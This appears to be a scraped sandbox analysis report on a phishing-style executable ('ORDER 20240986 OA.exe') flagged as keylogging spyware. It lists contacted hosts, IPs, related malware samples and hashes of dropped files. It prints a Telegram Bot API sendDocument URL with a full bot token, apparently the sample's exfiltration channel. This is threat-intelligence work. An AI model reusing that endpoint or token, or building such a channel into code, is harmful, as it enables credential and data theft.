                                                                                    https://reallyfreegeoip.org/xml/8.46.123.75$ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C8D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF9000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E28000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E53000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CAF000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F2A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://reallyfreegeoip.orgORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C8D000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037CB5000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CF9000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E28000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E53000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038CAF000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038F2A000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038C84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://api.telegram.orgORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ORDER 20240986 OA.exe, 00000004.00000002.2972013904.0000000038E9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.telegram.org/bot7396856636:AAFzZvZlhz352HQorBY7sPxLQBc4vVQnrB8/sendDocument?chat_id=6553ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D51000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D65000.00000004.00000800.00020000.00000000.sdmp, ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037D76000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://reallyfreegeoip.org/xml/ORDER 20240986 OA.exe, 00000004.00000002.2970820723.0000000037C1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        • No. of IPs < 25%
                                                                                                        • 25% < No. of IPs < 50%
                                                                                                        • 50% < No. of IPs < 75%
                                                                                                        • 75% < No. of IPs
                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                        149.154.167.220
                                                                                                        api.telegram.orgUnited Kingdom
                                                                                                        62041TELEGRAMRUfalse
                                                                                                        188.114.96.3
                                                                                                        reallyfreegeoip.orgEuropean Union
                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                        158.101.44.242
                                                                                                        checkip.dyndns.comUnited States
                                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                                        167.250.5.91
                                                                                                        sierrassinfinusadas.com.arArgentina
                                                                                                        264649NUTHOSTSRLARfalse
                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                        Analysis ID:1559976
                                                                                                        Start date and time:2024-11-21 08:59:08 +01:00
                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                        Overall analysis duration:0h 7m 42s
                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                        Report type:full
                                                                                                        Cookbook file name:default.jbs
                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                        Number of analysed new started processes analysed:6
                                                                                                        Number of new started drivers analysed:0
                                                                                                        Number of existing processes analysed:0
                                                                                                        Number of existing drivers analysed:0
                                                                                                        Number of injected processes analysed:0
                                                                                                        Technologies:
                                                                                                        • HCA enabled
                                                                                                        • EGA enabled
                                                                                                        • AMSI enabled
                                                                                                        Analysis Mode:default
                                                                                                        Analysis stop reason:Timeout
                                                                                                        Sample name:ORDER 20240986 OA.exe
                                                                                                        Detection:MAL
                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@3/5@4/4
                                                                                                        EGA Information:
                                                                                                        • Successful, ratio: 100%
                                                                                                        HCA Information:
                                                                                                        • Successful, ratio: 96%
                                                                                                        • Number of executed functions: 191
                                                                                                        • Number of non-executed functions: 135
                                                                                                        Cookbook Comments:
                                                                                                        • Found application associated with file extension: .exe
                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                        TimeTypeDescription
                                                                                                        03:01:28API Interceptor2114x Sleep call for process: ORDER 20240986 OA.exe modified
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        149.154.167.220Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                          DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                  new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                    FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                      114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                          BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            188.114.96.3CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.mffnow.info/1a34/
                                                                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.mydreamdeal.click/1ag2/
                                                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.questmatch.pro/ipd6/
                                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • filetransfer.io/data-package/I7fmQg9d/download
                                                                                                                            need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                            • www.rtpwslot888gol.sbs/jmkz/
                                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • filetransfer.io/data-package/Bh1Kj4RD/download
                                                                                                                            http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                                                            • kklk16.bsyo45ksda.top/favicon.ico
                                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • filetransfer.io/data-package/XrlEIxYp/download
                                                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • filetransfer.io/data-package/7pdXjNKP/download
                                                                                                                            158.101.44.242Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            rPO_1079021908.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            PROFORMA + PENDENTES.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            Revised invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • checkip.dyndns.org/
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            reallyfreegeoip.orgSTAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 104.21.67.152
                                                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            checkip.dyndns.comSTAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 132.226.8.169
                                                                                                                            GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 132.226.247.73
                                                                                                                            sierrassinfinusadas.com.arPO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            EQ_AW24 New Order Request.xlx.exeGet hashmaliciousGuLoader, StormKitty, XWormBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            PRICE ENQUIRY - RFQ 6000073650.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            api.telegram.orgDocuments.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            TELEGRAMRUeddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            • 149.154.167.99
                                                                                                                            Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            DEVIS_VALIDE.jsGet hashmaliciousXWormBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            114117914 - Rebound Electronics.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Secured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                                                            • 1.1.1.1
                                                                                                                            ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.140.238
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.6
                                                                                                                            ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.6
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            ORACLE-BMC-31898UShttp://interpro.wisc.edu/courses/maintaining-asphalt-pavements/?utm_source=Brochure&utm_medium=postal&utm_campaign=D487&utm_term=SHB&utm_content=SepGet hashmaliciousUnknownBrowse
                                                                                                                            • 147.154.51.84
                                                                                                                            Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            FACTURA A00072-24.- TPC CORPORATE EVENTS SL - PILAR FORGA.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 193.122.130.0
                                                                                                                            BOQ and Full Specification.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            MB267382625AE.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 158.101.44.242
                                                                                                                            QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 193.122.6.168
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adBenefit Enrollment -16oy1xb.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            file.exeGet hashmaliciousJasonRATBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            GST DRC-01A - DIN-20230359XL050081843E_msg.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            Quote document and order list.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            new order #738833.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ePO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://ollama.com/Get hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            Lreticupdwy.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            37f463bf4616ecd445d4a1937da06e19z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            eddzD2MA12.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            HnJdZm51Xl.exeGet hashmaliciousAmadey, Clipboard HijackerBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            YyA4O1TBSW.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            zlibwapi.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            REQUEST SCHL-30112023-M1 Quotation_1033855_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            STAFF RECORD_pdf.arj.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 167.250.5.91
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            C:\Users\user\AppData\Local\Temp\nsx1318.tmp\System.dllPayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                              Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                  Conchoids12.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                    Korrekturlsning.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      rTransferenciarealizada451236.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                        rTransferenciarealizada451236.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                          Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                            Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                              MG-Docu6800001.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                Process:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                File Type:Dyalog APL transfer
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):441422
                                                                                                                                                Entropy (8bit):6.974215186749837
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:+1++BQoVXU2p0IPDh1qxw8xgoPVc85HD9xx7tedzXdAYNALYvtEeV:+1ZSoVXrp0IPLqxFLxpD9MdztpAEv1
                                                                                                                                                MD5:4B9AE0012D965E9A7A0C1B47AF4ECB58
                                                                                                                                                SHA1:D76789EEA7266E6F2C64E081EA9AB77E42E7A5D6
                                                                                                                                                SHA-256:52ECEB4356B037DC5E86517A261F3CC4BC48B7402462AC3F02E56CD8FCD9E2BA
                                                                                                                                                SHA-512:FACEA292A8A4D6534ABECCFC641BBF3041B4D2B992FE6CD6EBFC44D6334B40384490BE1FFA7D2C37DEE7D1101A7EA9D262206DB463D25E3B085F9B4C447752C7
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````
                                                                                                                                                Process:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):73531
                                                                                                                                                Entropy (8bit):1.2569404898190384
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:dVICOgr5CpPXeGASSCorJvHtPvpwqcQ+5pPZg71l4oLuZK52Oc410+RaL7VomsEa:dVcPX7U1R9mPZgx1hn32+emD40rd
                                                                                                                                                MD5:22148562A5A87FF1BECCAE5E77D87142
                                                                                                                                                SHA1:D1B04F09ACFC146855AA02A8C530AA8A45DF3F24
                                                                                                                                                SHA-256:B09EF713D0920E9671DA35332C6DAE7C1E12BE409A7077D6CA3E07938F9C08E9
                                                                                                                                                SHA-512:3F96B2ABED75C8EA941E45BB3835EF4D5FC92C5C5F829A738641FD398D88BB838E7C22A0F5F998BF387A5CE4ADC77EECAA049BCFB1A9ADD476871C871D58E811
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview:......................................................................................x..........................|........................................l...................a.........................................U.....................k..........................................G..................................................................|.....b....................O...R..........n...................&.....................l..................!.......6......... ......S.......................................}........................................7..................................................................................................................................................B......#......b....................60........?.....z.......>..........................:..............%..l...........g...........................=D.....{.....................................&........................{.......................i..........................................5.]............
                                                                                                                                                Process:C:\Users\user\Desktop\ORDER 20240986 OA.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):220203
                                                                                                                                                Entropy (8bit):1.262001836842358
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:EBCX3JLNVpAeI+EgywY0Szqqv3ib1RuU7thllrhAKF3+O1jaJgMH8JHuHR6qTSIT:EkLjwqF1z1MoqyH
                                                                                                                                                MD5:F8A828CA56113806A25802FF2AF74282
                                                                                                                                                SHA1:B016C4258BD1F9A19989E0C6B7AB993ED02DF96F
                                                                                                                                                SHA-256:95941451FFB946693877FBD721001ACC32FE70D75EA68CAB1756B3ADF77DCFF4
                                                                                                                                                SHA-512:6725AA09040FAC962CCFF2EF9897FB6F3F3706FE60D8C55A69CB9E0C21362B3C8C186C573D647C0A50438686D6035361A4A20138C451E641D507BD1218D1E079
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
